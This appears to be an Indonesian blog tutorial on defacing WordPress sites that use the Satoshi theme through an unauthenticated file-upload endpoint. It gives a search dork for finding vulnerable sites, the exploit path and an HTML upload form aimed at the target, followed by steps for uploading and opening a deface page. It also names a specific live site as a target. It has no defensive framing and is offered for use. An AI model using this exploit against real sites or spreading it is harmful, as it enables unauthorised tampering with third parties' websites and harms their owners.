Tutorial Deface Metode Wordpress Satoshi Theme.

Hallo Sobat Sobat razzer kali ini saya akan membagikan tutorial Deface Metode Wordpress Satoshi Theme. Oke langsung saja kita kaga perlu banyak omong ya teman teman.

Bahan Bahan Yang Harus Kalian Perlukan.

• Hp/Pc
• Internet 

Untuk Dork Nya :

inurl:/wp-content/themes/satoshi/

Exploit :

/wp-content/themes/satoshi/upload-file.php

Csrf :

<form enctype="multipart/form-data"

action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">

File Lu Ya Oke: <input name="uploadfile" type="file" /><br />

<input type="submit" value="Kentot Saja" />

</form

Step 1 :

Kalian dorking dulu dengan Dork diatas, lalu kalian pilih salah 1 web.

Step 2 :

Apabila kalo kalian sudah pilih web nya maka kalian masukkan xploit nya.

Contoh :

https://target.com/wp-content/themes/satoshi/upload-file.php.

Step 3 :

Nah kalo error itu tanda nya Vuln ya teman teman bukan nya ga bisa itu vuln.

Step 4 :

Lalu kalian pergi ke notepad kalian atau text editor kalian. Lalu kalian masukkin Csrf nya contoh gambar di bawah.

Step 5 :

Lalu kalian Save dengan (Ekstensi html). Nah kalo kalian sudah save lalu kalian pergi ke folder kalian maka kalian cara nama folder yang csrf nya.

Step 6 :

Nah lalu kalian masukkan Script Deface kalian dengan ekstensi html. Lalu kalian Klik Upload maka hasil nya seperti gambar di bawah.

Step 7 :

Nah kalo ada ada bacaan sukses, langsung kita panggil akses nya dengan /wp-content/themes/satoshi/images/namafilesc.html

Contoh :

https://target.com/wp-content/themes/satoshi/images/namafilesc.html

Live target : http://wordsmyth.se/wp-content/themes/satoshi/upload-file.php

Sumber tutor : https://www.attackernetworkteam.com/2020/02/deface-metode-wordpress-satoshi-theme.html?m=1

Good Luck!!

Ridwan_Kun

Anak nolep pecandu IT.

Bagikan Artikel ini